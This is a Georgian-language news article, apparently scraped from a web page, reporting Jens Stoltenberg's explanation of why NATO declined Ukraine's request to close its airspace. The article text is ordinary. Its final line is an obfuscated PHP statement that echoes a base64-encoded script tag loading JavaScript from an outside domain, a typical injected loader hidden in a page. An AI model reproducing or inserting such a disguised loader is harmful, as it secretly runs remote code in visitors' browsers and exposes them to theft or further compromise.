celsiusi
ავერსი საქკაბელი
ნატოს გენერალური მდივნის იენს სტოლტენბერგის ინფორმაციით, ალიანსის წევრმა ქვეყნებმა განიხილეს უკრაინის თხოვნა მისი საჰაერო სივრცის ჩაკეტვასთან დაკავშირებით, თუმცა მას მხარი არ დაუჭირეს.
 
სტოლტენბერგის განმარტებით, უკრაინის საჰაერო სივრცის ჩასაკეტად ერთადერთი გზა არსებობს - ნატოს საჰაერო ძალებმა რუსეთის თვითმფრინავები უნდა ჩამოყაროს, რაც ევროპაში სრულმასშტაბიან ომს გამოიწვევს. მისი თქმით, სწორედ ამ მიზეზით, ნატო არ გეგმავს კონფლიქტში ჩართვას არც ხმელეთზე და არც ცაში.
 
„ეს იქნება კიდევ უფრო სახიფათო, უფრო დამანგრეველი და მოიტანს დიდ ადამიანურ წამებას. ამიტომ, ჩვენ მკაფიოდ განვაცხადეთ, რომ არ ვაპირებთ უკრაინაში შესვლას, არც ხმელეთით, არც უკრაინის საჰაერო სივრცეში. რა თქმა უნდა, ერთადერთი გზა საჰაერო სივრცის ჩასაკეტად, არის ნატოს სამხედრო თვითმფრინავების გაგზავნა უკრაინის საჰაერო სივრცეში და ჩაკეტილი საჰაერო ზონის შექმნა რუსული თვითმფრინავების ჩამოგდების გზით.
 
ჩვენ გვესმის სასოწარკვეთა, მაგრამ ასევე გვჯერა, რომ თუ ამას გავაკეთებთ, ეს, საბოლოო ჯამში, მიგვიყვანს სრულმასშტაბიან ომამდე ევროპაში უფრო მეტი ქვეყნის ჩართულობით და მიგვიყვანს ბევრად მეტ ადამიანურ ტანჯვამდე. ეს არის მიზეზი იმისა, რატომაც მივედით ამ მტკივნეულ გადაწყვეტილებამდე, რომ გამოვიყენოთ მძიმე სანქციები, მნიშვნელოვანი დახმარება გავუწიოთ უკრაინას, გავაძლიეროთ ეს დახმარება, მაგრამ ეს გავაკეთოთ ნატოს ძალების უშუალოდ კონფლიქტში ჩაურთველად არც ხმელეთზე და არც ცაში,“- განაცხადა სტოლტენბერგმა.
846
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");